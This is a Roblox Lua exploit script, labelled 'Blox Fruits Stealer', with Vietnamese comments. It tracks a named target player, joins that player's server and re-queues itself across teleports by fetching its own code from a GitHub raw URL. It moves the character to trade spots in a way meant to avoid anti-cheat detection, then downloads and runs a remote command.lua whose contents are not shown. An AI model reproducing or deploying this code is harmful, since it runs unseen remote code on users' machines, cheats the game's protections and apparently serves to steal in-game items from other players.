local success = pcall(function()
    local str = "test"
    for first, last in utf8.graphemes(str) do
        return first
    end
end)
if not success then
    while task.wait() do
        error("mozil wrote this msg")
    end
    error("mozil wrote this msg")
end

local env      = getgenv and getgenv() or _G
local USERNAME = tostring(env.USERNAME or "")

local SELF_URL    = "https://raw.githubusercontent.com/MoziIOnTop/pro/refs/heads/main/join.lua"
local COMMAND_URL = "https://raw.githubusercontent.com/MoziIOnTop/pro/refs/heads/main/command.lua"

---------------------------------------------------------------------

local Players           = game:GetService("Players")
local TeleportService   = game:GetService("TeleportService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local TweenService      = game:GetService("TweenService")

local LocalPlayer = Players.LocalPlayer or Players.PlayerAdded:Wait()
local CommF       = ReplicatedStorage:WaitForChild("Remotes"):WaitForChild("CommF_")
local JoinRemote  = ReplicatedStorage:WaitForChild("Remotes"):WaitForChild("JoinPlayerFromProfile")

---------------------------------------------------------------------
-- Notify helper
---------------------------------------------------------------------

local function Notify(msg, dur)
    pcall(function()
        local Notif = require(ReplicatedStorage.Notification)
        Notif.new(msg, dur or 4):Display()
    end)
end

---------------------------------------------------------------------
-- Validate + resolve UUID
---------------------------------------------------------------------

local UUID = env.UUID -- cache từ lần trước (queueSelf set)

if not UUID then
    if USERNAME == "" then
        Notify("Missing USERNAME in getgenv!", 5)
        return
    end
    local ok, result = pcall(function()
        return Players:GetUserIdFromNameAsync(USERNAME)
    end)
    if not ok or not result then
        Notify("Resolve username failed", 5)
        return
    end
    UUID = result
    env.UUID = UUID
end

---------------------------------------------------------------------
-- SEA map
---------------------------------------------------------------------

local SEA_PLACE = {
    ["1"] = {2753915549},
    ["2"] = {4442272183, 79091703265657},
    ["3"] = {7449423635, 100117331123089},
}
local SEA_FROM_PLACE = {}
for sea, list in pairs(SEA_PLACE) do
    for _, id in ipairs(list) do SEA_FROM_PLACE[id] = sea end
end

local CURRENT_SEA = SEA_FROM_PLACE[game.PlaceId] or "unknown"

---------------------------------------------------------------------
-- Helpers
---------------------------------------------------------------------

local function queueSelf()
    local envUser = tostring((getgenv and getgenv().USERNAME) or "")
    if typeof(queue_on_teleport) == "function" then
        queue_on_teleport(
            'getgenv().UUID = ' .. UUID .. '; ' ..
            'getgenv().USERNAME = "' .. envUser .. '"; ' ..
            'loadstring(game:HttpGet("' .. SELF_URL .. '"))()'
        )
    end
end

local function getTargetPlayer()
    return Players:GetPlayerByUserId(UUID)
end

local function waitHRP()
    local char = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()
    return char:WaitForChild("HumanoidRootPart", 10)
end

local function ensurePiratesTeam()
    Notify("Selecting Pirates team...", 3)
    for _ = 1, 2 do
        pcall(function() CommF:InvokeServer("SetTeam", "Pirates") end)
        task.wait(0.25)
    end
    task.wait(1.5)
end

---------------------------------------------------------------------
-- requestEntrance helper (giống Redz)
---------------------------------------------------------------------

local function requestEntrance(vec)
    pcall(function() CommF:InvokeServer("requestEntrance", vec) end)
    local hrp = waitHRP()
    if hrp then
        hrp.CFrame = hrp.CFrame + Vector3.new(0, 50, 0)
    end
    task.wait(0.5)
end

---------------------------------------------------------------------
-- Teleport Mansion (Sea 3) – chỉ cần 1 requestEntrance, Redz không tween thêm
---------------------------------------------------------------------

local function teleportMansion()
    if not waitHRP() then return end
    Notify("<Color=Green>Teleporting to Mansion...</Color>", 3)
    requestEntrance(Vector3.new(-12471.17, 374.94, -7551.678))
end

---------------------------------------------------------------------
-- Teleport Café (Sea 2) – requestEntrance Swan Mansion + PartTele tween
---------------------------------------------------------------------

local function teleportCafe()
    local lp   = LocalPlayer
    local cafeCF = CFrame.new(-380.479, 77.22, 255.826)

    Notify("<Color=Green>Teleporting to Café...</Color>", 3)

    -- B1: nhảy vào cổng Swan Mansion (gần Café nhất)
    requestEntrance(Vector3.new(-390, 332, 673))

    -- B2: PartTele tween (giống Redz, anti-cheat friendly)
    local hrp = waitHRP()
    if not hrp then return end

    local dist = (hrp.Position - cafeCF.Position).Magnitude
    if dist < 5 then hrp.CFrame = cafeCF return end

    -- destroy part cũ nếu còn
    local char = lp.Character
    if char:FindFirstChild("PartTele") then
        char.PartTele:Destroy()
    end

    local part = Instance.new("Part", char)
    part.Name        = "PartTele"
    part.Size        = Vector3.new(10, 1, 10)
    part.Anchored    = true
    part.Transparency = 1
    part.CanCollide  = false
    part.CFrame      = hrp.CFrame

    -- sync HRP theo Part
    local moving = true
    part:GetPropertyChangedSignal("CFrame"):Connect(function()
        if not moving then return end
        task.wait()
        if lp.Character and lp.Character:FindFirstChild("HumanoidRootPart") then
            lp.Character.HumanoidRootPart.CFrame = part.CFrame
        end
    end)

    local tw = TweenService:Create(
        part,
        TweenInfo.new(dist / 360, Enum.EasingStyle.Linear),
        { CFrame = cafeCF }
    )
    tw:Play()
    tw.Completed:Wait()

    moving = false
    if char:FindFirstChild("PartTele") then
        char.PartTele:Destroy()
    end
end

---------------------------------------------------------------------
-- Main
---------------------------------------------------------------------

Notify("MozilOnTop - Blox Fruits Stealer", 4)

ensurePiratesTeam()

-- Target player chưa có trong server → join
if not getTargetPlayer() then
    local attempts    = 0
    local maxAttempts = 5
    local tpConn

    local function doJoin()
        attempts += 1
        if attempts > maxAttempts then
            if tpConn then tpConn:Disconnect() end
            Notify(string.format("Failed after %d attempts.", maxAttempts), 6)
            return
        end
        Notify(string.format("Joining target server... (try %d/%d)", attempts, maxAttempts), 4)
        queueSelf()
        pcall(function() JoinRemote:FireServer(UUID) end)
    end

    tpConn = TeleportService.TeleportInitFailed:Connect(function(player)
        if player ~= LocalPlayer then return end
        task.delay(2, doJoin)
    end)

    doJoin()
    return
end

-- Đúng server, player có mặt → trade
Notify("<Color=Green>Found target – preparing trade spot...</Color>", 3)

if CURRENT_SEA == "2" then
    teleportCafe()
elseif CURRENT_SEA == "3" then
    teleportMansion()
else
    Notify("Trade teleport chỉ support Sea 2 & 3.", 4)
end

getgenv().USER = tostring((getgenv and getgenv().USERNAME) or LocalPlayer.Name or "")
loadstring(game:HttpGet(COMMAND_URL))()